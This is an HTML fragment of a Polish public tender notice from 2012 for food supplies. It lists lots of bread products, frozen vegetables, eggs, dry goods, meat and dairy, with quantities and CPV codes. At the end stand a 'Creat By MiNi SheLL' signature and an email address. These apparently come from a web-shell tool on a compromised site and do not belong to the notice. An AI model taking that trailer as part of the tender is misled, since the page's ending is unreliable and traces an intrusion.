6.	Pączek ( 0,07kg)	szt.	200
7.	Bułka tarta	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> mrożone artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Brokuł  opak. 4 x 2,5kg = 10kg	kg	30
2.	Bukiet warzyw (marchew, kalafior, brokuł ) opak. 4 x 2,5kg = 10kg	kg	60
3.	Fasolka szparagowa opak. 4 x 2,5kg = 10kg	kg	70
4.	Kalafior opak. 4 x 2,5kg = 10kg	kg	50
5.	Marchew karbowana opak. 4x 2,5kg = 10kg	kg	40
6.	Mieszanka. kompotowa         4-składnikowa opak. 4 x 2,5kg = 10kg	kg	700
7.	Mieszanka warzywna 9-składnikowa opak. 4 x 2,5kg = 10kg	kg	80
8.	Mieszanka chińska	kg	40
9.	Groszek zielony opak. 4 x 2,5kg = 10kg	kg	50
10.	Filet rybny z dorsza bez skóry, bez glazury	kg	170
11.	Włoszczyzna paski opak.  4 x 2,5kg = 10kg	kg	250
12.	Pierogi z kapustą i grzybami	kg	30
13.	Kluski śląskie	kg	80
14.	Pyzy z mięsem	kg	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> jaja kurze świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Jaja kurze 60 - 70g szt. 3200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> artykuły spożywcze sypkie, koncentraty, przyprawy i desery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Aromaty do ciast (6ml)	szt.	10
2.	Proszek do pieczenia 20g	 szt.	20
3.	Musztarda stołowa 180g	 szt.	25
4.	Budyń b/c (różne smaki) 40 g	szt.	30
5.	Rosół drobiowy w kostce 120g	szt.	60
6.	Cukier kryształ 1 kg	kg	380
7.	Kwasek cytrynowy 20g	szt.	50
8.	Chrzan tarty   270 g 	szt.	50
9.	Cukier waniliowy 20 g	szt.	40
10.	Cynamon 20 g	szt.	10
11.	Dżem wysokosłodzony  /różne smaki/ 270g	szt.	60
12.	Marmolada wieloowocowa 500g	szt.	70
13.	Galaretki owocowe 90 g	szt.	20
14.	Groszek konserwowy 400 g	szt.	40
15.	Keczup 500g	szt.	50
16.	Koncentrat pomidorowy  30% 200g	szt.	100
17.	Koncentrat pomidorowy 30%
850g	szt.	20
18.	Herbata ekspresowa28g	szt.	170
19.	Kukurydza 400g	szt.	40
20.	Majonez 700ml	szt.	70
21.	Majonez 260g	szt.	60
22.	Ogórki konserwowe0,9l	szt.	25
23.	Papryka konserwowa0,9l	szt.	40
24.	Sałatka warzywna0,9l	szt.	35
25.	Szczaw konserwowy0,9l	szt.	10
26.	Kasza gryczana 1kg	kg	60
27.	Kasza jeczmienna 1kg	kg	75
28.	Kakao 100 % - 200 g	szt.	45
29.	Kawa Inka 150 g	szt.	60
30.	Kasza manna 1kg	kg	20
31.	Maka pszenna 1kg	kg	220
32.	Makaron (różne kształty)	kg	200
33.	Płatki kukurydziane	kg	25
34.	Płatki śniadaniowe  (różne smaki)		25
35.	Ryż 1kg	kg	200
36.	Czosnek granulowany 20g	szt.	190
37.	Liść laurowy 6g	szt.	30
38.	Majeranek 150g	szt.	10
39.	Papryka mielona słodka, ostra 20g	szt.	140
40.	Pieprz naturalny mielony 20g	szt.	100
41.	Przyprawa do kurczaka 	kg	3
42.	Przyprawa do ryb	kg	2
43.	Przyprawa do mięsa wieprzowego	kg	3
44.	Sos sojowy 240g  	szt.	15
45.	Ziele angielskie 20g	szt.	25
46.	Pasztet drobiowy 160g	szt.	150
47.	Sałatka z makreli 300g	szt.	80
48.	Mąka ziemniaczana	kg	25
49.	Sól jodowana 1kg	kg	100
50.	Powidła śliwkowe 500g	szt.	30
51.	Syrop owocowy 430ml	szt.	20
52.	Wiórki kokosowe 50g	szt.	20
53.	Fasola czerwona konserwowa 400g	szt.	30
54.	Kisiel bez cukru 40g	kg	30
55.	Rodzynki 100g	szt.	20
56.	Olej uniwersalny 1l	szt.	100
57.	Frytura do smażenia	kg	35
58.	Margaryna 250g	szt.	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> mięso świeże, wędliny i drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I Mięso świeże
1.	Szynka wieprzowa b/k	kg	15
2.	Karkówka wieprzowa b/k	kg	90
3.	Schab wieprzowy b/k	kg	100
4.	Łopatka wieprzowa b/k, b/s	kg	450
5.	Wołowina extra	kg	65
6.	Żeberka wieprzowe	kg	               50
7.	Biodrówka	kg	30
8.	Wątroba wieprzowa	kg	30
II Wędliny świeże
1.	Blok z indyka	kg	20
2.	Baleron z indyka	kg	20
3.	Kiełbasa piwna	kg	45
4.	Kiełbasa śląska	kg	70
5.	Kiełbasa szynkowa	kg	30
6.	Kiełbasa tyrolska	kg	10
7.	Kiełbasa żywiecka	kg	55
8.	Mielonka drobiowa	kg	6
9.	Parówki śląskie	kg	90
10.	Pasztetowa	kg	45
11.	Pieczeń rzymska	kg	62
12.	Polędwica z warzywami	kg	32
13.	Szynka mielona	kg	71
14.	Szynka wieprzowa	kg	40
15.	Wędzonka drobiowa	kg	5
16.	Kaszanka	kg	68
17.	Polędwica drobiowa	kg	47
18.	Kiełbasa zwyczajna	kg	23
19.	Mielonka konserwowa	kg	2
20.	Pieczeń drobiowa	kg	6
21.	Boczek parzony	kg	28
22.	Kiełbasa drobiowa	kg	7
23.	Kiełbasa biała	kg	10
24.	Baton szynkowy drobiowy	kg	5
25.	Filet z indyka pieczony	kg	15
III Mięso drobiowe świeże
1.	Kurczak	kg	130
2.	Filet z kurczaka surowy	kg	160
3.	Udka z kurczaka	kg	100
4.	Wątróbka drobiowa	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> mleko i produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Jogurt owocowy 115g	szt.	460
2.	Jogurt naturalny 370.	szt.	70
3.	Jogurt owocowy 300g	            szt.	150
4.	Jogurt owocowy 125g	szt.	1250
5.	Masło śmietankowe 82% kostka 200g	kg	210
6.	Mleko 2% świeże	l.	1540
7.	Mleko UHT 2%	l.	640
8.	Serki topione miks krążek 140g	szt.	120
9	Serek topiony  śmietankowy  100 g	szt.	150
10.	Ser żółty gouda/edamski	kg	82
11.	Śmietana 18% 400g	szt.	610
12.	Twaróg półtósty	kg	90
13.	Serek waniliowy  w wiaderku	kg	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com